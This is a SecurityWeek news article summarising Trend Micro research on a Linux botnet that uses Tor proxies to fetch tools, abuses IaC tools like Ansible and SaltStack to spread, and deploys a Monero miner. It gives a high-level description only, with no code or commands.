Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Application Security

Tor-Based Linux Botnet Abuses IaC Tools to Spread

A recently observed malware botnet targeting Linux systems is employing many of the emerging techniques among cyber-criminals, such as the use of Tor proxies, legitimate DevOps tools, and the removal of competing malware, according to new research from anti-malware vendor Trend Micro.

A recently observed malware botnet targeting Linux systems is employing many of the emerging techniques among cyber-criminals, such as the use of Tor proxies, legitimate DevOps tools, and the removal of competing malware, according to new research from anti-malware vendor Trend Micro.

The researchers say the malware is capable of downloading all of the files it needs from the Tor anonymity network, including post-infection scripts and legitimate, essential binaries that might be missing from the environment, such as ss, ps, and curl.

With the help of these tools, the malware can make HTTP requests, gather information about the infected system, and even run processes.

To perpetrate the attacks, the threat actor behind the botnet maintains a big network of proxies to maintain connections between the surface web and the Tor network.


[RELATED: Emotet Botnet Disrupted in Law Enforcement Operation ]


In addition to converting requests, these proxies send various information about the victim systems, including IP addresses, architecture, username, and part of the uniform resource identifier (URI) to establish which architecture-dependent binary to download.


The abused proxy servers have vulnerable open services, suggesting exploitation without the knowledge of the server owner. During their investigation, Trend Micro’s researchers discovered that the proxy service was always disabled after a while.


The Linux malware can run on a multitude of system architectures, with the initial script designed to perform several checks on the target before downloading additional files and continuing the infection process.


Thus, Trend Micro believes that the threat actor behind the botnet might be setting up for launching a broader campaign targeting Linux systems.


The observed malware sample can remove certain cloud-related services and agents and abuse infrastructure-as-code (IaC) tools such as Ansible, Chef, and SaltStack, to spread to other systems.


At the moment, the botnet deploys the XMRig Monero (XMR) miner onto the infected machines. The crypto-miner uses its own mining pool and the malware searches the system for other running miners and attempts to remove them.


“This malware sample does not need other software; the Linux operating system is the only requirement for the malware to run and spread. It downloads the essential tools (ss, ps, curl) because not every environment targeted for infection has them and it’s likely that the user doesn’t have the necessary permissions to install them on the system (as in the case of containers),” Trend Micro added.


Related: Massive Android Botnet Hits Smart TV Ad Ecosystem

Related: New ‘FreakOut’ Malware Ensnares Linux Devices Into Botnet


Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Nation-State

The North Korean APT tracked as TA444 is either moonlighting from its previous primary purpose, expanding its attack repertoire, or is being impersonated by...

Mobile & Wireless

Technical details published for an Arm Mali GPU flaw leading to arbitrary kernel code execution and root on Pixel 6.

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Mobile & Wireless

Apple’s iOS 12.5.7 update patches CVE-2022-42856, an actively exploited vulnerability, in old iPhones and iPads.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Identity & Access

Hackers rarely hack in anymore. They log in using stolen, weak, default, or otherwise compromised credentials. That’s why it’s so critical to break the...